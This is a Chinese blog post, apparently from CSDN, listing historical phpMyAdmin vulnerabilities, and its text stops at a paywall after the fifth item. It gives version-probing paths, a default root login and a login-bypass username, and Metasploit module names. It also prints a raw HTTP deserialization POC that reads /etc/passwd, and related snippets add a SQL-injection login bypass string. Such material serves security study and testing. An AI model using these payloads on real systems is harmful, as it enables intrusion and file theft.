最全phpmyadmin漏洞汇总

最新推荐文章于 2025-04-22 00:09:31 发布
最新推荐文章于 2025-04-22 00:09:31 发布
阅读量3.9w 收藏 105
点赞数 18
分类专栏: 漏洞复现 文章标签: phpmyadmin web安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_47418965/article/details/121708917
版权

目录

一、phpMyAdmin简介

二、查看phpmyadmin版本

三、历史漏洞及poc利用

1、万能密码直接登入

2、CVE-2009-1151:远程代码执行

3、CVE-2012-5159:任意PHP代码攻击

4、CVE-2013-3238:远程PHP代码执行

5、WooYun-2016-199433:任意文件读取漏洞

6、CVE-2014 -8959:本地文件包含

7、CVE-2016-5734 :后台命令执行RCE

8、CVE-2017-1000499 跨站请求伪造

9、CVE-2018-12613:后台文件包含

10、CVE-2018-19968:任意文件包含/RCE

11、CVE-2019-12922 跨站请求伪造

12、CVE-2020-0554:后台SQL注入

四、一些总结

五、参考链接

一、phpMyAdmin简介

        phpMyAdmin 是一个用php编写的免费软件工具,旨在通过Web友好界面处理MySQL的管理。phpMyAdmin 支持对 MySQL 和 MariaDB 数据库的广泛操作。经常使用的操作(有如管理数据库、表、列、关系、索引、用户、权限等)可以通过用户界面执行,当然可以直接执行任何 SQL 语句。

        从1998年发布第一版,到目前发布的最新版为5.1.1,全部历史版本说明

phpMyAdmin 5.2未来版本与PHP7.2及更高版本和MySQL/MariaDB 5.5及更高版本兼容。
phpMyAdmin 5.1.1当前版本与PHP7.1及更新版本和MySQL/MariaDB 5.5及更新版本兼容。
phpMyAdmin 5.0.0与PHP 7.1及更新版本和MySQL/MariaDB 5.5及更新版本兼容的旧版本。一直支持到2021年2月24日。
phpMyAdmin 4.9.7旧版本,兼容PHP5.5至7.4和MySQL/MariaDB 5.5及更新版本。当前仅支持安全修复程序。
phpMyAdmin4.9.0当前版本与PHP5.5至7.3和MySQL 5.5及更新版本兼容。
phpMyAdmin4.8.0 phpMyAdmin4.6.0-4.7.0旧版本,兼容PHP5.5至7.1和MySQL 5.5及更新版本。支持期至2017年4月1日。
phpMyAdmin4.4.0旧版本,与PHP5.3.7至7.0和MySQL 5.5兼容。一直支持到2016年10月1日。
phpMyAdmin4.1.0-4.3.0旧版本,与PHP5.3和MySQL 5.5兼容。一直支持到2015年10月1日。
phpMyAdmin4.0.0旧版本,与PHP5.2和MySQL 5兼容。不支持PHP 5.5或更新版本。支持期至2017年4月1日。

二、查看phpmyadmin版本

        直接在phpmyadmin的url后加下面文件路径爆出:

/readme
/changelog
/Change
/changelog.php  
/Documetation.html 
/Documetation.txt 
/translators.html
/doc/html/index.html

三、历史漏洞及poc利用

1、万能密码直接登入

​弱口令:版本phpmyadmin2.11.9.2, 直接root用户登陆,无需密码

​万能密码:版本2.11.3 / 2.11.4,用户名'localhost'@'@"则登录成功

2、CVE-2009-1151:远程代码执行

漏洞位置:配置文件/config/config.inc.php

影响版本:phpmyadmin 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1

​利用模块:msf>> exploit/unix/webapp/phpmyadmin_config

3、CVE-2012-5159:任意PHP代码攻击

漏洞位置:文件server_sync.php中包含外部文件导致

影响版本:phpMyAdmin v3.5.2.2

​利用模块:msf>> exploit/multi/http/phpmyadmin3522_backdoor

4、CVE-2013-3238:远程PHP代码执行

漏洞位置:preg_replace()函数可被利用在服务器端执行任意PHP代码

​影响版本:phpmyadmin 3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3 ANYUN.ORG

​利用模块:msf>> exploit/multi/http/phpmyadminpregreplace

5、WooYun-2016-199433:任意文件读取漏洞

影响版本:phpMyAdmin version 2.x版本

POC如下:

POST /scripts/setup.php HTTP/1.1 
Host: target.com
Accept-Encoding: gzip, deflate Accept: */*
Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trid ent/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded 
Content-Length: 80


action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
最低0.47元/天 解锁文章
phpmyadmin弱口令检测工具
01-19
注:仅供学习使用,不能用于非法用途,大家可以根据需要下载。
phpmyadmin弱口令至getshell 漏洞复现
Boom!脑洞大爆炸的博客
06-28 1888
phpmyadmin弱口令至getshell 漏洞复现
基于phpMyAdmin漏洞攻击实战感悟
最新发布
2301_78588589的博客
04-22 152
主要利用了文件包含的漏洞,将写有木马病毒的php文件压缩为zip文件上传,再通过构造zip伪协议,构造一个url从而将木马病毒上传,最后控制服务器。过滤的方式主要分为前端过滤和后端过滤,通过输入特殊符号弹出的弹窗,可识别是js的前端过滤,所以要跳过过滤只需要将浏览器对该网址的前端服务关掉即可。四、主要是利用了该网站的文件上传漏洞,将木马shell更改为网站允许上传的后缀即可控制该网站的服务器。最后将实验文件上传到此处,由于用的靶机是学校提供的教学靶机,所以靶机up就不提供了,文件仅供参考。
phpMyAdmin 漏洞利用
lendq的Blog
02-08 2590
国内 很多 网址 都 喜欢 使用phpMyAdmin来 管理 MySQL数据库 而且多数 可以 通过phpMyAdmin 完全操控Mysql数据库。 phpMyAdmin功能常强大 可以执行 操作系统 命令,导入或者导出数据库 一般会存在Root密码过于简单,代码泄露``Mysql配置等漏洞 通过一些技术手段 ,多数能获取网站webshell,甚至是服务器权限。 phpMyAd...
phpmyadmin漏洞合集
weixin_46626737的博客
07-02 666
../,比如在cmd命令行中,cd 到一个不存在的目录,会报错,在对传参的参数进行过滤时,需要过滤代码,但是传参点很多,需要多次输入过滤代码,开发人员考虑到使用将过滤代码写入过滤文件,通过include包含该文件,来达到一个过滤的目的,假如这个包含的文件是可以控制的,那么就可能导致文件包含,该漏洞中,主要是因为对于传参包含文件的参数过滤时,只是对其内容进行检测白名单验证,只要target参数是白名单中的。但是如果在其后加一个/../,系统会默认认为还是在当前目录,就不会对错误目录进行检查,也就不会报错;
phpmyadmin漏洞汇总
m0_64481831的博客
05-27 2939
phpmyadmin是一个以PHP为基础,以web方式架构在网站主机上的mysql的数据库管理工具,让管理者可用web接口管理mysql数据库,便于远端管理mysql数据库。
phpMyAdmin 4.8.x 最新版 本地文件包含漏洞利用
Ambulong的博客
06-21 6077
今天ChaMd5安全团队公开了一个phpMyAdmin最新版中的本地文件包含漏洞phpmyadmin4.8.1后台getshell。该漏洞利用不要求root帐号,只需能够登录 phpMyAdmin 便能够利用。 在这篇文章中我们将使用VulnSpy的在线 phpMyAdmin 环境来演示该漏洞的利用。 VulnSpy 在线 phpMyAdmin 环境地址:http://www.vulnspy.c...
phpMyAdmin 漏洞
weixin_69065643的博客
08-03 575
判断在www在Extensions同级。修改日志文件状态和日志文件保存路径,在sql语句执行界面执行命令。访问shell,使用工具连接。
常见cms漏洞PhPMyadmin
ineedmoreMuQ的博客
08-03 363
安装后直接访问即可密码为mysql的密码,在小皮中即可查看。
phpmyadmin-文件包含漏洞代码审计过程(超详细)
qq_59020256的博客
01-26 1646
phpmyadmin-文件包含漏洞
DVWA与phpMyAdmin的测试资料汇总
- DVWA安全漏洞:DVWA提供了多种安全漏洞,包括跨站脚本攻击(XSS)、SQL注入、安全配置错误、会话劫持等,通过这些漏洞,用户可以学习和实践如何发现和利用这些漏洞。 - DVWA使用场景:DVWA通常用于网络安全教学...
史上最全网络安全面试题汇总 ! !
网安技术分享
08-04 9880
php爆绝对路径方法? 单引号引起数据库报错 访问错误参数或错误路径 探针类文件如phpinfo 扫描开发未删除的测试文件 google hacking phpmyadmin报路径:/phpmyadmin/libraries/lect_lang.lib.php 利用漏洞读取配置文件找路径 恶意使用网站功能,如本地图片读取功能读取不存在图片,上传点上传不能正常导入的文件 你常用的渗透工具有哪些,最常用的是哪个? burp、nmap、sqlmap、awvs、蚁剑、冰蝎、dirsearch、御剑等等 xs
软件漏洞-泛微OA-汇总
weixin_30855099的博客
09-20 3439
SQL注入 前台SQL注入 用户名:admin' or password like 'c4ca4238a0b923820dcc509a6f75849b' and 'a'='a 密码: 1 验证页面参数 -loginid (1)/login/VerifyLogin.jsp?loginfile=%2Fwui%2Ftheme%2Fecology7%2Fpage%2Flogin.js...
【2025最新】phpMyAdmin渗透利用全链路:信息收集→漏洞探测→后渗透提权技巧
浩策盾悟
03-13 8932
phpinfo()/tmp/root得知 通过日志我们就可以进行其它渗透行为。
phpmyadmin反序列化漏洞
qq_53008544的博客
05-01 725
phpMyAdmin的Setup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代码。由于配置文件被保存到了服务器上,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码。
phpMyadmin各版本漏洞
aiquan9342的博客
10-04 1193
一: 影响版本:3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3 ANYUN.ORG   概述:PhpMyAdmin存在PREGREPLACEEVAL漏洞   利用模块:exploit/multi/http/phpmyadminpregreplace CVE: CVE-2013-3238 二: 影响版本:phpMyAdmin v3.5....
PhpMyAdmin 远程代码执行漏洞 (CVE-2016-5734)复现
君莫hacker的博客
09-12 795
0x01 漏洞介绍 漏洞描述 phpMyAdmin是一套开源的、基于WebMySQL数据库管理工具。在其查找并替换字符串功能中,将用户输入的信息拼接进preg_replace函数第一个参数中。 在PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞漏洞编号 CVE-2016-5734 受影响版本 4.0.10.16之前4.0.x版本 4.4.15.7之前4.4.x版本
PhpMyAdmin漏洞介绍
weixin_45253622的博客
03-19 3621
获取网站绝对路径,
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值